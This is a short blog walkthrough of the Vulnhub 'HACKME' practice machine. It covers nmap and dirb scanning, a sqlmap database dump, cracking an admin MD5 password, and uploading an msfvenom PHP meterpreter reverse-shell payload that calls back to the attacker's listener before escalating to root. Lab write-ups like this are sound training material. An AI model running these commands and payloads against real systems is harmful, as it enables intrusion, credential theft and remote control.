Vulnhub HACKME Walkthrough

Found the IP of the host using netdiscover and now lets run nmap on it:

Nmap –A –T4 –p- 192.168.1.13 –vv

Port 22 and 80 … lets start dirb to list the directories and see what we can find

Dirb http://192.168.1.13

Clicking the ( Sign up now ) link on the LogIn page directed me to a page to fill in my details and then redirected me again to a Welcome page where I can search for Books

While setting up the account I used burpsuite and captured the information and saved it to a file to run SQLMAP

Sqlmap –r output.txt –dbs –batch

We can see 5 databases , the one we need is the last one with the name ( webapphacking ) so we run:

sqlmap -r sql.txt -D webapphacking –dump-all

Superadmin is sure the one , checked the hash with hash-identifier and its MD5 hash … google it and decode it came with the password : Uncrackable

Login in using superadmin and Uncrackable:

We need to upload a shell code im going to use weevely ( got shell but running the file to become root didn’t work)

Another way is simply create : msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -o script.php

Upload it and with meterpreter we set it up

Run exploit and then shell … going straight to /home and then /hackme … only one file to run and it gave us a root

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s